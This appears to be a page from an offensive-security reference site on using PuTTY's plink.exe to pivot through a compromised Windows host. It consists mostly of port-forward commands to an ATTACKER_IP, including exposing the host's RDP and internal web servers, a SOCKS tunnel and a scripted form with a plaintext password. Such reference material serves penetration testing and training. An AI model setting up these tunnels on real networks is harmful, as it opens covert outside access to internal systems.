Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Plink is PuTTY’s command-line SSH client. Useful for pivoting from Windows targets that don’t have native SSH.

Download

Pre-installed on many Windows systems with PuTTY. Otherwise: 
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
Binary: plink.exe

Local Port Forward

Access internal service from attacker via Windows pivot. 
plink.exe -L LOCAL_PORT:TARGET_IP:TARGET_PORT user@ATTACKER_IP

Example

plink.exe -L 8080:10.10.10.5:80 user@ATTACKER_IP

Remote Port Forward

Expose Windows pivot’s local service to attacker. 
plink.exe -R ATTACKER_PORT:127.0.0.1:LOCAL_PORT user@ATTACKER_IP

Example — Expose RDP

plink.exe -R 3390:127.0.0.1:3389 kali@ATTACKER_IP
Attacker accesses localhost:3390 → Windows pivot RDP.

Dynamic Port Forward (SOCKS)

plink.exe -D 1080 user@ATTACKER_IP

Non-Interactive (Scripted)

Accept host key automatically and provide password via echo: 
echo y | plink.exe -R 3390:127.0.0.1:3389 -l kali -pw password ATTACKER_IP
Password visible in process list. Use SSH keys when possible.

With SSH Key

plink.exe -i key.ppk -R 3390:127.0.0.1:3389 kali@ATTACKER_IP
Convert OpenSSH key to PPK with PuTTYgen if needed.

Common Pivoting Scenario

Attacker (Kali) ← plink → Windows Pivot → Internal Network

# On Windows pivot — expose internal web server to attacker
plink.exe -R 8080:10.10.10.5:80 kali@ATTACKER_IP -pw password

# On attacker — access internal web
curl http://127.0.0.1:8080

Quick Reference

TaskCommand
Local forwardplink.exe -L PORT:TARGET:PORT user@IP
Remote forwardplink.exe -R PORT:127.0.0.1:PORT user@IP
SOCKSplink.exe -D 1080 user@IP
Non-interactiveecho y | plink.exe -R ... -l user -pw pass IP